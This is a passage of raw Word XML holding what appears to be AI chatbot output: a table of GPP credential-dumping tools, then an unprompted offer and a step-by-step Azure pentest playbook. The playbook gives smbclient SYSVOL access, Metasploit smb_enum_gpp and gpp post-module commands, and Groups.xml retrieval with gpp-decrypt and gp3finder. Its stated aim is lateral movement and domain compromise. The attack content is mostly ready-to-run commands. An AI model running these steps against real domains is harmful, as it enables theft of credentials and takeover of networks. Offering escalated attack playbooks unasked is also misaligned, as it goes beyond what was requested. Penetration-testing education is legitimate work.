            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60772AF0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="185DA400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2D2C7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Metasploit SMB Enumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="691CF9BA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Valid domain user creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A541D2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>auxiliary/scanner/smb/smb_enum_gpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39DAC252" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Remote GPP XML enumeration &amp; decryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="3A2E35FA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9502B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Metasploit Post Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="723555FD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Meterpreter session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0330B8FC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>post/windows/gather/credentials/gpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F354893" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Local and remote cached GPP creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="5EE53033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98B11" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Manual SMB + Decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B8DD72" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Valid SMB creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54144930" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>smbclient + gpp-decrypt / gp3finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29488A0F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Manual file download + decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="4A4B995D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6EAB3" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>PowerShell Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02168429" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Low privilege shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D8D609" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Empire privesc/gpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D97F980" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Extract GPP creds via PS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="297378ED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753FC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>PowerSploit PowerShell Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="386DC429" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Local PowerShell access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="660B3C06" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Import-Module Get-GPPPassword.ps1 + Get-GPPPassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="580A97EE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Extract plaintext creds locally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DF2F26A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="6AF3AE1A">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4AAFEF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>If you want, I can prepare a fully automated pentest playbook for Azure environments including lateral movement and privilege escalation after dumping GPP credentials. Just ask!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C6573" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="05DCCFE9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="0320DD0A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Great! Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>detailed, step-by-step automated pentest playbook</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> for exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Preferences (GPP) credential dumping</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> in an Azure environment covering </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows AD Domain Controllers, domain-joined Windows VMs, and local accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC6F60" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="216B19B4">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D965D5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Azure Windows VM Pentest Playbook: Credential Dumping via Group Policy Preferences (GPP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66247072" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="24C5C46A">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFABDFA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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456DD44" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Enumerate and dump local and domain user passwords stored insecurely in GPP on Domain Controllers and domain-joined Windows VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63732B14" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use dumped credentials for lateral movement, privilege escalation, and further domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54489301" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="520CEEEC">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C670D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Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A47D2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Access to Azure environment with target Windows VMs and Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB224EB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Valid domain user credentials or a low-privilege shell on a domain-joined machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F3F35" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Kali Linux or similar attacker system with tools installed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2168CD91" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2EA26" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>PowerShell Empire or equivalent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD8FAB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7D611F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>gpp-decrypt or gp3finder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703BF78" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>PowerSploit Get-GPPPassword.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D55D4C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="5536BA76">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45690C71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Phase 1: Initial Access &amp; Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F311A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1.1 Validate SMB Access to Domain Controller SYSVOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DB9B6B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>smbclient //&lt;DC_IP&gt;/SYSVOL -U &lt;domain_user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE64410" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECE251A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>smbclient //192.168.1.103/SYSVOL -U raj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75724A0F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Confirm you can list files under:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9005C7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>/sysvol/&lt;domain&gt;/Policies/{GPO_GUID}/Machine/Preferences/Groups/Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A8585" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="2F9C1BD5">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C214489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1.2 Enumerate GPP XML Files via Metasploit SMB Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F3A79" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218313CB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="3C9B1270" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>use auxiliary/scanner/smb/smb_enum_gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241F154D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set RHOSTS &lt;DC_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780F0CE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set SMBUser &lt;domain_user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2F3C5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set SMBPass &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E7360" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D2D87" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Output: Decrypted cpassword strings for accounts created or modified via GPP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D84D11" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="12E4817D">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211416B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Phase 2: Local Exploitation &amp; Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B078135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2.1 Gain a Low-Privilege Shell on a Domain-Joined Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F4B834" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use any known exploitation or valid creds to get Meterpreter or PowerShell shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B7696" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="63485A58">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06112E37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2.2 Extract Cached GPP Credentials Using Metasploit Post Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C269FAA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>use post/windows/gather/credentials/gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C812A0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set SESSION &lt;meterpreter_session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F641C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003053CD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Output: Decrypted cpassword entries from cached Group Policy files locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B99D7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="69BEDC2D">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19BA0E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2.3 Manually Retrieve and Decrypt GPP XML Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0370FE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># From attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5212AC2B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>smbclient //&lt;DC_IP&gt;/SYSVOL -U &lt;domain_user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163DD0A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="5F23A64B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># Download Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF6708" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>cd sysvol/&lt;domain&gt;/Policies/{GPO_GUID}/Machine/Preferences/Groups/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65108B4D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>get Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BCEA4E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="58758A4D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># Decrypt cpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30478F41" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>gpp-decrypt &lt;encrypted_cpassword&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F7DF0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F4B69" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>gp3finder.exe -D &lt;encrypted_cpassword&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CD236" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="5A118E00">
